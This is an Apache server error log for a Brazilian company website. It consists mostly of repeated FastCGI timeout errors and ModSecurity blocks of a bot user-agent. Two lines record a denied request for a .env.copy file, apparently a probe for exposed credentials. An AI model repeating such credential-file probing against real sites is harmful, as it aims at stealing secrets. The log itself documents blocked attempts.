[Sun Mar 15 12:54:19.118509 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36952] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:54:41.138156 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37240] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:55:02.173802 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37498] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:55:23.041793 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37718] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:55:44.121788 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37962] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:56:06.102788 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38202] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:56:24.738145 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.244.31:34486] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbWqHbQATo66fKoS7zP5wAAANU"]
[Sun Mar 15 12:56:27.129570 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:38482] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:56:48.069827 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38780] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:57:11.122380 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39070] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:57:28.529833 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.228.16:40012] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbW6HbQATo66fKoS7zQAgAAANc"]
[Sun Mar 15 12:57:32.069831 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39314] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:57:53.057858 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39532] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:58:14.122789 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39810] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:58:36.135807 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40028] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:58:58.129798 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40264] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:59:19.131274 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40504] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 12:59:40.150293 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40740] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:00:01.126966 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:40980] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:00:23.128232 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41216] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:00:44.125792 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41436] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:01:06.129787 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41662] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:01:28.118013 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41888] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:01:43.853405 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.244.31:34190] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbX59SswJuvopo3lOjvGwAAAIo"]
[Sun Mar 15 13:01:49.053843 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42126] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:02:11.122757 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:42356] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:02:33.121830 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42622] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:02:55.124591 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:42910] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:03:16.145806 2026] [proxy_fcgi:error] [pid 21806:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43138] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:03:37.137910 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43432] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:03:39.465829 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.228.16:56800] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbYW7ABkC4fWIHEf8F0yAAAAFc"]
[Sun Mar 15 13:03:58.118163 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43680] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:04:19.121803 2026] [proxy_fcgi:error] [pid 11972:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43950] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:04:40.119497 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44182] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:05:01.137806 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44426] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:05:23.117820 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44720] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:05:44.032165 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44962] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:06:05.134119 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:45254] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:06:27.145808 2026] [proxy_fcgi:error] [pid 11972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45476] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:06:48.131330 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45700] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:06:54.921343 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.244.31:59496] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbZHrABkC4fWIHEf8F1EwAAAEc"]
[Sun Mar 15 13:07:10.131245 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46010] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:07:32.121934 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46234] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:07:56.341851 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:46484] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:08:18.070374 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46726] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:08:39.105845 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46902] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:09:01.099995 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47022] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:09:22.117814 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47134] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:09:43.129854 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47242] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:10:04.137917 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47372] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:10:25.825812 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47516] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:10:48.257781 2026] [proxy_fcgi:error] [pid 21805:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:47730] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:11:09.033925 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47860] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:11:30.121847 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47986] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:11:51.139744 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48158] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:12:12.130253 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48298] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:12:33.057901 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48408] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:12:54.125770 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48532] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:13:16.132190 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48676] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:13:37.033856 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48818] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:14:00.049803 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49032] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:14:23.069843 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:49162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:14:44.129816 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49286] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:15:05.121687 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:49470] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:15:26.119246 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:15:47.129778 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:49768] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:16:10.126498 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50020] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:16:31.045841 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:50178] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:16:52.137768 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50366] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:17:13.133782 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50580] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:17:34.121857 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:50690] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:17:56.061861 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50882] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:18:18.126871 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51088] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:18:39.117817 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51282] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:19:00.135864 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51494] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:19:12.331231 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.228.16:58458] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbb_5qj1wV0Si-OkedqMQAAABA"]
[Sun Mar 15 13:19:21.121788 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51718] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:19:44.129033 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51918] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:20:06.123074 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52180] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:20:27.449799 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52434] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:20:49.037877 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:21:10.090955 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52860] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:21:31.129895 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:53016] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:21:53.121806 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53186] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:22:20.141864 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53426] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:22:41.137999 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53644] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:22:51.386758 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.244.31:59446] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbc29SswJuvopo3lOjxXAAAAIY"]
[Sun Mar 15 13:23:02.144939 2026] [proxy_fcgi:error] [pid 21533:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53830] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:23:24.126730 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54038] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:23:45.111090 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54256] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:24:06.127184 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54426] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:24:27.126076 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54644] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:24:28.205939 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.228.16:35170] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbdPHbQATo66fKoS7zTAAAAANM"]
[Sun Mar 15 13:24:49.117822 2026] [proxy_fcgi:error] [pid 11972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54878] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:25:11.108541 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55056] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:25:32.169868 2026] [proxy_fcgi:error] [pid 21806:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55210] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:25:54.129777 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55388] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:26:15.113690 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:55572] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:26:36.125198 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:55804] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:26:57.129830 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56008] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:27:18.121774 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56198] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:27:39.130957 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56382] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:27:58.427848 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.244.31:44764] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbeDnjZBu2q05ozVU_gTgAAAUY"]
[Sun Mar 15 13:28:02.128440 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:56612] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:28:24.045858 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56794] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:28:46.082350 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57008] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:29:07.122149 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57224] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:29:28.122149 2026] [proxy_fcgi:error] [pid 21805:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57430] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:29:35.235738 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.228.16:54094] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbeb3bQATo66fKoS7zT0gAAAMA"]
[Sun Mar 15 13:29:49.129873 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57690] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:30:10.121984 2026] [proxy_fcgi:error] [pid 21806:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57904] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:30:33.141799 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58094] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:30:54.066005 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58300] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:31:16.230177 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58466] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:31:37.497225 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58656] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:31:59.123302 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:58882] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:32:20.126860 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59068] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:32:41.125771 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:59352] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:32:57.448387 2026] [access_compat:error] [pid 21946:tid 140411666392832] [client 4.239.241.168:60712] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env.copy
[Sun Mar 15 13:32:57.728915 2026] [access_compat:error] [pid 21806:tid 140411649607424] [client 4.239.241.168:57680] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/.env.copy
[Sun Mar 15 13:33:02.138321 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59610] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:33:23.129807 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59784] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:33:23.983539 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.244.31:34656] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbfU7ABkC4fWIHEf8F4ywAAAEI"]
[Sun Mar 15 13:33:45.122817 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59996] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:34:08.105825 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60216] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:34:29.668820 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60382] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:34:51.121894 2026] [proxy_fcgi:error] [pid 21533:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60632] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:35:04.867482 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.228.16:57602] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbfuHjZBu2q05ozVU_hPQAAAVI"]
[Sun Mar 15 13:35:12.121775 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60824] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:35:34.129225 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:32848] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:35:55.149806 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33076] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:36:17.780977 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33318] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:36:39.122230 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33528] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 13:37:00.131677 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33714] AH01075: Error dispatching request to : (polling)
